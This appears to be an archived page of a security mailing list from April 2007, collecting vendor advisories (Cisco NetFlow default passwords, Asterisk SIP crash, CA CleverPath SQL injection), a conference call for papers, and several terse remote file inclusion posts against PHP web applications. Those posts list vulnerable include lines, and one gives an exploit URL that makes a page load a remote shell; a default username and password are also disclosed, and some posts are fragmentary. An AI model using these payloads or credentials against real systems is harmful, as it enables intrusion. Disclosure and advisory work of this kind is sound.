Cisco Security Advisory: Default Passwords in NetFlow Collection Engine

2007-04-25 Thread Cisco Systems Product Security Incident Response Team
Hash: SHA1

Cisco Security Advisory: Default Passwords in NetFlow Collection Engine

Advisory ID: cisco-sa-20070425-nfc

Revision 1.0

For Public Release 2007 April 25 1600 UTC (GMT)

- -


Versions of Cisco Network Services (CNS) NetFlow Collection Engine (NFC)
prior to 6.0 create and use default accounts with identical usernames
and passwords. An attacker with knowledge of these accounts can modify
the application configuration and, in certain instances, gain user
access to the host operating system.

The upgrade to NFC version 6.0 is not a free upgrade. This default
password issue does not require a software upgrade and can be changed
by a configuration command for all affected customers. The workaround
detailed in this document demonstrates how to change the passwords in 5.0.

This advisory is posted at

Affected Products

Vulnerable Products

This vulnerability affects Cisco NetFlow Collection Engine running
software versions prior to 6.0.0. The software version of the Cisco
NetFlow Collection Engine can be determined by either logging into
the web-based user interface (UI) or using the show-tech parameter of
the nfcollector command from the host operating system. For customers
running version 6.0 or later, the nfcollector command uses the version
parameter to determine the software level.

Users can determine the NFC version by using a web browser to navigate
to http://nfc-hostname:8080/nfc in a web browser and selecting About
in the upper left-hand corner. The browser displays the NFC version in a
new window.

The NFC version can be determined from the host operating system
by using the show-tech parameter of the /opt/CSCOnfc/nfcollector
command. On systems running NFC version 5.0.3, the output from
/opt/CSCOnfc/bin/nfcollector show-tech should display a result similar
to the following:

   $ /opt/CSCOnfc/nfcollector show-tech

   ** pkginfo/swlist **
   Name: CSCOnfc  Relocations: /opt/CSCOnfc
   Version : 5.0.3 Vendor: Cisco Systems, Inc
   Release : 2 Build Date: Wed 06 Sep 2006 
11:19:59 AM EDT
   Install Date: Mon 12 Feb 2007 04:26:54 PM EST  Build Host:
   Group   : Applications/Network  Source RPM: 
   Size: 109385602License: Copyright (c) 
2002-2003 by Cisco Systems, Inc.
   Signature   : (none)
   URL :
   Summary : Cisco NetFlow Collector
   Description :
   Cisco CNS NetFlow Collection Engine receives, filters, and aggregates NetFlow
traffic data generated by Cisco routers and switches.

Products Confirmed Not Vulnerable

No other Cisco products are known to be vulnerable to the issues described in
this advisory.


Cisco CNS NetFlow Collection Engine is used to collect and monitor
NetFlow accounting data for devices that support NetFlow, such as
routers and switches. This data can be used to provide a network
baseline, against which irregular activities like denial of service
(DoS) attacks, worms, and other malicious activity can be more easily

NFC is installed on a supported UNIX platform. The installation creates
a default web based user account, nfcuser, which is required to perform
application maintenance, configuration, and troubleshooting with a
password of nfcuser. In versions prior to 6.0, the Linux installer will
also create a local user, also nfcuser, on the operating system with a
default password also identical to the username. If the user already
exists, the Linux installer will change the password to be the same as
the username.

This issue is documented in Cisco Bug ID CSCsh75038 

Vulnerability Scoring Details

Cisco is providing scores for the vulnerabilities in this advisory based
Con the ommon Vulnerability Scoring System (CVSS).

Cisco will provide a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.

Cisco PSIRT will set the bias in all cases to normal. Customers
are encouraged to apply the bias parameter when determining the
environmental impact of a particular vulnerability.

CVSS is a standards based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided an FAQ to answer additional questions regarding CVSS at .

Cisco has also provided a CVSS calculator to help compute the environmental
impact for individual

MyNewsGroups RFI in include.php

2007-04-25 Thread alijsb
Author: Carlos Sánchez,[EMAIL PROTECTED]
BY : users, ali  saeid
exploit : 

HTMLeditbox 2.2 RFI

2007-04-25 Thread alijsb
name  version :HTMLeditbox  2.2
by : userz,s3rv3r_hack3r,saeid_only_linux,dNetGuru
bug :
_editor.php @include($settings[app_dir].'/inc/config.php');
exploit :

blogsystem 1.4 local remote = -rfi lfi -xss

2007-04-25 Thread info
by : userz !
ADMIN/index.php include($category./.$folder._.$page..php);
ADMIN/index.php include($category./.$action..php);
ADMIN/login.php include($lngTexts);
ADMIN/login.php include($lngConfig);
for example remote :
login to your user after that u can user exploit 
ADMIN/index.php include($category./.$folder._.$page..php);
local file include  remote file include in admin panel

WordPress v2.1.3 remote file include~

2007-04-25 Thread s433d_only_linux
by : userz , saeid...

#WordPress  2.1.3 Remote File Inclusion  #

Affected Software .: WordPress  2.1.3#
Download..:   #
Risk ..: high  #
Date .: 25/4/2007  #
Found by ..: s433d_only_linux  #
Contact ...: [EMAIL PROTECTED] #
Web .:  #
special thanx ... Ali Jasbi my beste friend#

Affected File: #


Re: 3Com's TippingPoint Denial of Service

2007-04-25 Thread Secure
TippingPoint is committed to assuring the security of our customers, and 
we take all reports of potential security issues against our products very 

Even though this report seems less than credible, we would encourgage the 
author of this advisory to contact us directly and provide us with 
additional details and sources to allow us to investigate this claim. 
All though there seems to be limited to no information available on how 
this apparent Denial of Service would be carried out, we've  put our 
resources towards attempting to reproduce the issue, and all versions of 
our TOS have performed as expected with no DoS emerging. 

Again, if the poster of this advisory has additional information available 
that would allow us to successfully reproduce these claims, we would 
appreciate if it was submitted to us for investigation. 
Submissions can be made to [EMAIL PROTECTED] or on the web at
Kind Regards, 
TippingPoint Security Response Team

04/24/2007 02:24 PM


3Com's TippingPoint Denial of Service

Vulnerability:   Denial of Service
Affected Product:3Com's TippingPoint IPS
Affected Versions:   All

Author:  Corroded_Lunchmeats_X


TippingPoint IPS is prone to DoS when a sequence of crafted packets are
destined for port 80.


When quickly flooded with packets destined for port 80, and an 
source port this causes the software to consume a huge amount of CPU time,
due to a badly written loop, causing the device to stop responding.


The Kinders Kricket Krew, Aunty_Richard, The dinosaurs who died in the


This  document and all the information it contains are provided as is,
for educational purposes only, without warranty  of  any  kind,  whether
express or implied.

The  authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of  the  information   provided  in
this  document.  Liability  claims regarding damage caused by the use of
any information provided, including any kind  of  information  which  is
incomplete or incorrect, will therefore be rejected.

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ASA-2007-011: Multiple problems in SIP channel parser handling response codes

2007-04-25 Thread Kevin P. Fleming
Asterisk Project Security Advisory - ASA-2007-011
|  Product   | Asterisk  |
|  Summary   | Multiple problems in SIP channel parser handling  |
|| response codes|
| Nature of Advisory | Denial of Service |
|   Susceptibility   | Remote Unauthenticated Sessions   |
|  Severity  | Critical  |
|   Exploits Known   | No|
|Reported On | March 20, 2007|
|Reported By | Mantis user ID 'qwerty1979'   |
| Posted On  | April 24, 2007|
|  Last Updated On   | April 24, 2007|
|  Advisory Contact  | [EMAIL PROTECTED]  |
| Description | Multiple problems have been identified in the Asterisk   |
| | SIP channel driver (chan_sip) when handling response |
| | packets from other SIP endpoints.|
| |  |
| | If the response packets did not contain a valid response |
| | code in the first line of the UDP packet, the Asterisk   |
| | SIP channel driver would fail to parse the packet|
| | properly and would cause the Asterisk process to die |
| | with a segmentation fault. This results in all active|
| | calls and other sessions being lost. |
| |  |
| | More details about these issues can be found at  |
| | |
| Resolution | All users are urged to upgrade to the appropriate version |
|| of their Asterisk product listed in the 'Corrected In'|
|| section below.|
|   Affected Versions|
|  Product  |   Release   |  |
|   |   Series|  |
|   Asterisk Open Source|1.0.x| has not been evaluated as|
|   | | this release series is no|
|   | | longer maintained|
|   Asterisk Open Source|1.2.x| all releases prior to 1.2.18 |
|   Asterisk Open Source|1.4.x| all releases prior to 1.4.3  |
| Asterisk Business Edition |A.x.x| all releases |
| Asterisk Business Edition |B.x.x| all releases prior to and|
|   | | including B.1.3.2|

CFP: 3rd European Conference on Computer Network Defense (EC2ND)

2007-04-25 Thread Stefano Zanero
Thanks in advance for sharing this CFP with any interested individual or
mailing list.

3rd European Conference on Computer Network Defense (EC2ND)
4-5 October 2007, FORTH-ICS, Heraklion, Crete, Greece

Call for Papers

The 3rd European Conference on Computer Network Defense
will take place in October 2007 at the Foundation for
Research and Technology Hellas, in Crete, Greece.

The theme of the conference is the protection of computer networks. The
conference will draw participants from academia and industry in Europe
and beyond to discuss hot topics in applied network and systems security.

EC2ND invites submissions presenting novel ideas at an early stage with
the intention to act as a discussion forum and feedback channel for
promising, innovative security research. While our goal is to solicit
ideas that are not completely worked out, and might have challenging and
interesting open questions, we expect submissions to be supported by
some evidence of feasibility or preliminary quantitative results.

Topics include but are not limited to:

* Intrusion Detection
* Denial-of-Service
* Privacy Protection
* Security Policy
* Peer-to-Peer and Grid Security
* Network Monitoring
* Web Security
* Vulnerability Management and Tracking
* Network Forensics
* Wireless and Mobile Security
* Cryptography
* Network Discovery and Mapping
* Incident Response and Management
* Malicious Software
* Web Services Security
* Legal and Ethical Issues

Submitting a Paper
You are hereby invited to submit papers up to 6-8 single-spaced pages
long. We particularly encourage position papers on preliminary work that
shows promise, rather than mature and well-polished papers studying
well-known ideas. Surprising  results and thought-provoking ideas will
be strongly favored. All submissions will be reviewed by the Program
Committee. Accepted papers will be published in the electronic
proceedings of the conference. Some papers may have to go through a
shepherding process in collaboration with one of the PC members.

Important Dates

* Submissions due:
  June 24, 2007
* Notification:
  July 24, 2007
* Final version due:
  August 10, 2007


General chair: Vasilios A. Siris (FORTH) and Panos Trimintzios (ENISA)
PC co-chairs: Sotiris Ioanidis and Kostas Anagnostakis
Local Arrangements Chair: Vasilios A. Siris
Local Arrangements Committee: Yiannis Askoksylakis and Anna Doxastaki

Program Committee
Herbert Bos, Vrije Universiteit Amsterdam, The Netherlands
Eric Cronin, University of Pennsylvania, USA
George Danezis, KU Leuven, Belgium
Austin Donnelly, Microsoft Research, UK
Stefanos Gritzalis, University of the Aegean, Greece
Mehis Hakkaja, ENISA, EU
Bjorn Knutsson, KTH, Sweden
Christopher Kruegel, TU Wien, Austria
Tieyan Li, Institute for Infocomm Research, Singapore
Javier Lopez, Universidad de Malaga, Spain
Ulrike Meyer, Nokia Siemens Networks GmbH  Co., Germany
Stefan Miltchev, Microsoft, USA
Philippe Owezarski, LAAS-CNRS, France
Michalis Polychronakis, University of Crete and FORTH-ICS, Greece
George C. Polyzos, AUEB/MMlab, Greece
Carlos Ribeiro, Universidade Tecnica de Lisboa, Portugal
Pierangela Samarati, Universita di Milano, Italy
Diomidis Spinellis, Athens University of Economics and Business, Greece
Theodore Tryfonas, University of Glamorgan, UK
Sven Ubik, CESNET, Czech Republic
Stefano Zanero, Politecnico di Milano, Italy

Steering Committee
Panagiotis Trimintzios, ENISA
Evangelos Markatos, FORTH-ICS, Greece
Andrew Blyth, University of Glamorgan, UK

Cordiali saluti,
Stefano Zanero

Politecnico di Milano - Dip. Elettronica e Informazione
Via Ponzio, 34/5 I-20133 Milano - ITALY
Tel.+39 02 2399-4010
Fax.+39 02 2399-3411

HYIP Manager Pro Script Remote file Include

2007-04-25 Thread alijsb
vendor :
BY : userz,ali
u can find more then this one
exploit :

VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins Remote file Include

2007-04-25 Thread s433d_only_linux

VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins  Remote file Include 
Affected Software .: VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins
Risk ..: high 
Date .: 25/4/2007 
Found by ..: s433d_only_linux 
Contact ...: s433d_only_linux (at) yahoo (dot) de [email concealed] 
Web .: 
special thanx ... Ali Jasbi my beste friend
Affected File:
upload/admin.php include($admindirectory./.$key..php); 
upload/admin.php include($admindirectory./.$val..php); 

Security Advisory: CA CleverPath SQL Injection

2007-04-25 Thread Irene Abezgauz
The CA Clever Path Portal is a customizable portal for aggregation and
integration of data and applications. It is integrated into multiple CA
products including various Unicenter components. The CA CleverPath
utilizes a back end Database for storing data and allows usage of either
built in or external Database.

After identifying in CleverPath an irregular behavior when modifying
query parameters in the search mechanism, Hacktics has conducted a
research of identifying an SQL Injection vulnerability in the
implementation of the search query construction. 

The Finding
By modifying certain parameters in the execute search URL, it was
possible to cause the  application to send to the database queries that
are different than those originally  intended by the search engine, and
as a result retrieving the entire database contents  according to the
application user permissions scheme in the database.

Note: Due to the diversity of possible Database implementations for
CleverPath, the actual level of possible exploitation may vary between
different systems.

Exploit Details
Due to the complexity of the required syntax, the identified SQL
injection does not allow for trivial exploitation such as UNION SELECT.
However, data can be still retrieved using Binary Search techniques. 

For detailed technical description and exploit please visit

Affected Systems

Multiple CA products and 3rd party products utilizing the CleverPath


CA Has been notified of this vulnerability on Januarty 18th, and is
releasing a patch together with the publication of the vulnerability.

Irene Abezgauz
Senior Consultant  Account Manager
Hacktics Ltd.
Mobile: +972-54-6545405

Remote File Inclusion

2007-04-25 Thread s433d_only_linux

# b2evolution Remote File Inclusion#

Affected Software .: b2evolution   #
Risk ..: high  #
Date .: 25/4/2007  #
Found by ..: s433d_only_linux  #
Contact ...: [EMAIL PROTECTED] #
Web .:  #
special thanx ... Ali Jasbi my beste friend#

Affected File:
b2evolution\blogs/a_noskin.php  require $inc_path.'';
b2evolution\blogs/a_stub.phprequire $inc_path.'';
b2evolution\blogs/admin.php require_once $inc_path.'';
b2evolution\blogs/admin.php require 
b2evolution\blogs/admin.php require_once $inc_path.'';
b2evolution\blogs/admin.php require $control_path.$ctrl_mappings[$ctrl];
b2evolution\blogs/contact.php   require_once $inc_path.'';
b2evolution\blogs/contact.php   require $skins_path.'_msgform.php';
b2evolution\blogs/default.php   require_once $inc_path.'';
b2evolution\blogs/index.php require_once $inc_path.'';
b2evolution\blogs/index.php require $inc_path.'';
b2evolution\blogs/multiblogs.phprequire $skins_path.'_bloglist.php';
b2evolution\blogs/multiblogs.phprequire $skins_path.'_feedback.php';

:doruk100net RFI

2007-04-25 Thread alijsb
name  version :doruk100net
download :
by : userz,s3rv3r_hack3r,saeid_only_linux,farzad
exploit: http://victim/info.php?file=http://shell